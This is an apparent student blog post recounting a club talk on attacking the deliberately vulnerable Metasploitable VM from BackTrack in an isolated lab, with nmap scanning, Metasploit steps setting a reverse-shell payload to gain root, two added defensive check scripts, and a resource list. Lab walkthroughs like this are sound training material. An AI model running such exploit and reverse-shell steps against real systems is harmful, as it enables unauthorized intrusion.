Posted on January 4, 2013
Today we will go through the talk I gave at the ACM club last semester. I will also be talking about some resources for you, the student interested in cyber security.
Today we will be talking about backtrack and metasploitable.
Backtrack: an operating system used for penetration testing systems around the world.
metasploitable: an operating system that is vulnerable on purpose, so you can understand how to attack stuff.
Backtrack is basically an Ubuntu distribution with a bunch of cyber security tools tacked on. I recommend running backtrack in a VM rather than giving it a whole computer. While backtrack is pretty awesome, it's still a specialized OS. If you are serious about security you should give it at least 100 gigs of space. (You'll need this for Nexpose.)
So let’s get started:
Today we are going to use backtrack to attack metasploitable. We could attack one of many, many vulnerabilities, but for convenience we will be exploiting the IRC vulnerability that comes with metasploitable.
So first you’ll need to download metasploitable and backtrack.
You can get a lot more intentionally exploitable packages on SourceForge. I highly recommend poking around and seeing what you can play with!!!
Alright, next you need VirtualBox (or some other virtualization software):
There are a lot of reasons why VirtualBox is awesome. However, if we start getting into virtualization, we will probably never get to breaking into anything. Look for other posts by me on virtualization in the near future.
Important note: Not all processors support virtualization (most new CPUs do). You can check this by running:
dmesg | less
Look for statements like: “kvm: disabled by bios” and “kvm: no hardware support”
Looking at the tutorial:
So once you have VirtualBox (what I am using) or another virtualization program installed on your computer, and you have downloaded the ISO files, you'll need to install them.
You’ll need to do the following in virtualbox:
New -> Name: backtrack -> Memory size: 1024 (just what I used) -> Create a virtual hard drive now -> VDI -> Fixed size -> 100 GB
Then you need to click on the newly created hard drive, hit the folder button, find the backtrack ISO, and then hit Start.
You’ll need to do the same thing for metasploitable.
Okay, now we are ready to do some hacking (almost).
Now we need to adjust some settings in our virtual machines.
Go into Settings -> Network.
You'll need a host-only adapter for both metasploitable and backtrack. MAKE SURE YOU DO NOT GIVE METASPLOITABLE A NAT ADAPTER!!!!
If you do this you will be giving a vulnerable operating system access to the internet, which means your system will be very easy to compromise. Essentially it's like putting up a white flag, then running up to everyone that would want to kill you and asking them to shoot you, with a very large gun, on the whole internet.
What your system should look like at this point:
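One way to double-check the warning above before you power the vulnerable VM on, as an added example that is not from the original post: VirtualBox's `VBoxManage showvminfo <vm> --machinereadable` prints one nicN="<attachment>" line per adapter, and this script flags any adapter attached to NAT. The sample output below is constructed to mimic that format and is not a real capture.

```shell
#!/bin/sh
# Added example (not from the original post). Reads showvminfo-style text
# on stdin and reports any adapter attached to NAT, which would give the
# vulnerable guest a route to the internet.

# Prints the numbers of NAT-attached adapters; returns 1 if any were found.
find_nat_adapters() {
    # Lines look like nic1="hostonly", nic2="nat", nic3="none" ...
    nat=$(sed -n 's/^nic\([0-9]*\)="nat"$/\1/p')
    if [ -n "$nat" ]; then
        for n in $nat; do
            echo "adapter $n is attached to NAT"
        done
        return 1
    fi
    echo "no NAT adapters"
    return 0
}

# Constructed sample, modelled on the --machinereadable format: adapter 1 is
# host-only (correct for this lab) but adapter 2 was left on NAT by mistake.
SAMPLE_BAD='name="metasploitable"
nic1="hostonly"
hostonlyadapter1="vboxnet0"
nic2="nat"
nic3="none"'

# Constructed sample with only the host-only adapter enabled.
SAMPLE_GOOD='name="metasploitable"
nic1="hostonly"
hostonlyadapter1="vboxnet0"
nic2="none"'

# Demo run on the bad sample. On a live VM, pipe the real command in instead:
#   VBoxManage showvminfo metasploitable --machinereadable | sh check_nat.sh
printf '%s\n' "$SAMPLE_BAD" | find_nat_adapters \
    || echo "fix the VM network settings before starting it"
```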
You should also have a metasploitable window that looks like this:
Once you start backtrack you will need to do the following:
hit enter at boot:
Then you will need to pick text-only mode (whatever the first option is).
And a backtrack window that looks like this:
Now just type in “startx” and you will get to a GUI.
If you want to do everything from the command line, you can, but I don't recommend it.
Okay, so now we are going to get to the attacking part!!!!
I recommend going through each of the open ports in metasploitable, because attacking each service is good experience. Typically, non-vulnerable machines will have at most 2 open ports. In the case of a Mac you won't see any (I tried this last night).
So first you will need to log into metasploitable; the username and password are both msfadmin.
Now run ifconfig.
Notice the IP address: 192.168.56.102. This is what we care about.
Now go into your backtrack VM.
We will be running the command nmap -A -v 192.168.56.102 (this is the IP address of metasploitable in our example).
It is important to note that this may be different on your machine. You should run ifconfig on the metasploitable VM to be sure.
If you ran nmap correctly, you should get a list of all the open ports on metasploitable, which looks like 23 in all. (Quite a bit of practice.)
Each of the ports is a specific service, which has a networking protocol. Typically a service will always run over the same port. For instance, port 80 is always HTTP. (We can see it's listed here.)
This is how metasploit will know what services our target machine is running. (If we were attacking a real system we would scan for a whole bunch of ports, rather than just one.)
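As an added example (not from the original post), here is the kind of check a defender does with that same nmap output: pull the open ports out of the PORT/STATE/SERVICE table and compare them with the short list of ports a machine is supposed to expose, so anything extra stands out as an unplanned service. The scan text below is constructed to look like nmap's table and is not a real capture of metasploitable.

```shell
#!/bin/sh
# Added example (not from the original post). Parses nmap's port table from
# stdin and reports open ports that are not on an allow-list.

# Usage: list_open_ports < nmap_output  -> one "port service" line per open port
list_open_ports() {
    # Match rows like "6667/tcp open irc ..." and drop closed/filtered rows.
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { split($1, p, "/"); print p[1], $3 }'
}

# Usage: unexpected_ports "22 80" < nmap_output -> open ports outside the allow-list
unexpected_ports() {
    allow=" $1 "
    list_open_ports | while read -r port service; do
        case "$allow" in
            *" $port "*) ;;                 # expected, say nothing
            *) echo "$port $service" ;;     # not planned: investigate
        esac
    done
}

# Usage: count_open < nmap_output -> number of open ports
count_open() { list_open_ports | wc -l | tr -d ' '; }

# Constructed sample scan (version column deliberately elided).
SAMPLE_SCAN='Starting Nmap ( http://nmap.org )
Nmap scan report for 192.168.56.102
Host is up (0.00021s latency).
Not shown: 977 closed ports
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         (version elided)
22/tcp   open   ssh         (version elided)
23/tcp   open   telnet      (version elided)
80/tcp   open   http        (version elided)
139/tcp  open   netbios-ssn (version elided)
6667/tcp open   irc         (version elided)
8080/tcp closed http-proxy
Service detection performed.'

# Demo: a server that should only expose ssh and http.
echo "open ports: $(printf '%s\n' "$SAMPLE_SCAN" | count_open)"
echo "not on the allow-list (22 80):"
printf '%s\n' "$SAMPLE_SCAN" | unexpected_ports "22 80"
```

On a real scan, replace the sample with `nmap -A -v <host> | unexpected_ports "22 80"`.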
Now open a new terminal in backtrack and run
This is metasploit, the penetration testing framework.
Now run the command search scanner.
This will give you a listing of all the exploits available. Since we are going to attack IRC, we want to run:
Now all we need to do is type:
Then type show options.
Then type set RHOST 192.168.56.102 (this is metasploitable's IP address).
Then type show payloads.
Then you need to set a payload using
set PAYLOAD generic/shell_reverse_tcp
Now we have to set our host IP address. For this, run ifconfig in a separate terminal window on backtrack.
Now run set LHOST 192.168.56.101 (backtrack's IP address in our example).
Now simply type exploit.
If all went well, you should see the screen above; just type whoami.
If you see root, then you got root access!!! (The holy grail of all cyber security challenges.)
Now let’s talk about references.
This is a short list I have compiled of ways to improve your skills as a cyber security expert:
http://isisblogs.poly.edu/ <- nyu-poly’s blog
This blog is home to some of the most badass hackers and cyber security experts I know. You can trust anything that is written here.
This is Dan Guido’s homepage. He is one of the most knowledgeable hackers I have ever heard lecture.
A great blog, filled with tutorials and interesting articles, I highly recommend this as a secondary source to the isis blog.
Where to get pretty much any security tool you could want, for free.
A decent description of cyber security terms
A series of lectures for those interested in the policy side of cyber security
A decent overview of cybersecurity topics
More policy things.
Government R&D website
Lots and lots of security videos (some of them you have to pay for)
An overview of tools by the US government.
The reverse engineering subreddit, need I say more?